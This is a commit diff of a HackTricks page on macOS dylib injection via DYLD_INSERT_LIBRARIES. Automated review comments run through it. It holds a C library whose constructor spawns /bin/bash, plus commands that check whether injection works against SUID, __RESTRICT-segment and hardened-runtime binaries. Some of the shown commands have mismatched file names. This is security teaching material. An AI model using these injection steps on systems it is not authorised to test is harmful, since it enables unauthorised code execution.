GITBOOK-3926: change request with no subject merged in GitBook

This commit is contained in:
CPol 2023-05-15 10:48:42 +00:00 committed by gitbook-bot
parent 2b401d3335
commit 3484d7008e
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
2 changed files with 49 additions and 9 deletions

View File

@ -1132,11 +1132,12 @@ In the function **`processRestricted`** the reason of the restriction is set. Ch
* Existence of `__RESTRICT/__restrict` section in the macho binary.
* The software has entitlements (hardened runtime) without [`com.apple.security.cs.allow-dyld-environment-variables`](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_allow-dyld-environment-variables) entitlement or [`com.apple.security.cs.disable-library-validation`](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_disable-library-validation).
* If the lib is signed with the same certificate as the binary
* This will bypass the previous restrictions
In more updated versions you can find this logic at the second part of the function **`configureProcessRestrictions`.** However, what is executed in newer versions is the **beginning checks of the function** (you can remove the ifs related to iOS or simulation as those won't be used in macOS:.
In more updated versions you can find this logic at the second part of the function **`configureProcessRestrictions`.** However, what is executed in newer versions is the **beginning checks of the function** (you can remove the ifs related to iOS or simulation as those won't be used in macOS.
{% endhint %}
Find a example on how to (ab)use this in:
Find a example on how to (ab)use this and check the restrictions in:
{% content-ref url="dyld_insert_libraries.md" %}
[dyld\_insert\_libraries.md](dyld\_insert\_libraries.md)
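Review bot: the reworded sentence `In more updated versions ... as those won't be used in macOS.` still never closes the parenthesis opened at `(you can remove the ifs`; the change only dropped the stray colon before the full stop. Suggest `... as those won't be used in macOS).` and, since the sentence is being touched anyway, `In newer versions` instead of `In more updated versions`. Two lines below, `Find a example on how to (ab)use this and check the restrictions in:` should read `Find an example`.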

View File

@ -12,22 +12,22 @@
</details>
### Basic example
## Basic example
**Library to inject** to execute a shell:
```c
// gcc -dynamiclib example.c -o example.dylib
// gcc -dynamiclib -o inject.dylib inject.c
#include <stdio.h>
#include <syslog.h>
#include <stdio.h>
#include <unistd.h>
__attribute__((constructor))
int myconstructor(int argc, const char **argv)
{
printf("[+] dylib injected in %s\n", argv[0]);
syslog(LOG_ERR, "[+] dylib injected in %s\n", argv[0]);
printf("[+] dylib injected in %s\n", argv[0]);
execv("/bin/bash", 0);
}
```
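Review bot: `execv("/bin/bash", 0);` passes a NULL argv, which POSIX leaves undefined and which starts bash with no argv[0]; because this block is meant to be copied into `inject.dylib`, suggest `char *const args[] = {"/bin/bash", NULL}; execv("/bin/bash", args);`. Two smaller points in the same constructor: a `__attribute__((constructor))` function should be declared `void` rather than `int` (nothing consumes the return value and the body never returns one), and the `syslog(LOG_ERR, ...)` format string does not need the trailing `\n`. Since the `Bigger Scale` section below tells the reader to drop the `printf` and the `execv` when injecting into arbitrary binaries, a one-line comment on those two lines marking them as optional would save the reader a round trip.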
@ -48,17 +48,56 @@ int main()
Injection:
```bash
DYLD_INSERT_LIBRARIES=example.dylib ./hello
DYLD_INSERT_LIBRARIES=inject.dylib ./hello
```
### Bigger Scale
## Bigger Scale
If you are planing on trying to inject libraries in unexpected binaries you could check the event messages to find out when the library is loaded inside a process (in this case remove the printf and the `/bin/bash` executeion).
If you are planing on trying to inject libraries in unexpected binaries you could check the event messages to find out when the library is loaded inside a process (in this case remove the printf and the `/bin/bash` execution).
```bash
sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "dylib injected"'
```
## Check restrictions
### SUID & SGID
```bash
# Make it owned by root and suid
sudo chown root hello
sudo chmod +s hello
# Insert the library
DYLD_INSERT_LIBRARIES=inject.dylib ./hello
# Remove suid
sudo chmod -s hello
```
### Section `__RESTRICT` with segment `__restrict`
```bash
gcc -sectcreate __RESTRICT __restrict /dev/null hello.c -o hello-restrict
DYLD_INSERT_LIBRARIES=inject.dylib ./hello-restrict
```
### Hardened runtime
Create a new certificate in the Keychain and use it to sign the binary:
{% code overflow="wrap" %}
```bash
codesign -s <cert-name> --option=runtime ./hello
DYLD_INSERT_LIBRARIES=inject.dylib ./hello
codesign -f -s <cert-name> --option=library ./hello
DYLD_INSERT_LIBRARIES=example.dylib ./hello-signed #Will throw an error because signature of binary and library aren't signed by same cert
codesign -s <cert-name> inject.dylib
DYLD_INSERT_LIBRARIES=example.dylib ./hello-signed #Throw an error because an Apple dev certificate is needed
```
{% endcode %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
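Review bot: the new `Hardened runtime` block is not runnable as written because its file names do not line up: the binary that gets signed is `./hello`, but both injection tests run `./hello-signed`, and they inject `example.dylib` even though the rest of this commit renamed the library to `inject.dylib` (the last two lines sign `inject.dylib` and then still inject `example.dylib`). Suggest signing and testing the same path, e.g. `DYLD_INSERT_LIBRARIES=inject.dylib ./hello` after each `codesign` step, and using `inject.dylib` throughout. Three further points in this hunk: the heading `Section __RESTRICT with segment __restrict` has the two inverted, since `-sectcreate` takes the segment name first, so `gcc -sectcreate __RESTRICT __restrict /dev/null ...` creates segment `__RESTRICT` containing section `__restrict` (which is what the `__RESTRICT/__restrict` wording in the first file means); codesign's documented spelling is `--options runtime` and `--options library` (`-o runtime`), not `--option=runtime`; and `planing` in `If you are planing on trying to inject libraries` should be `planning`.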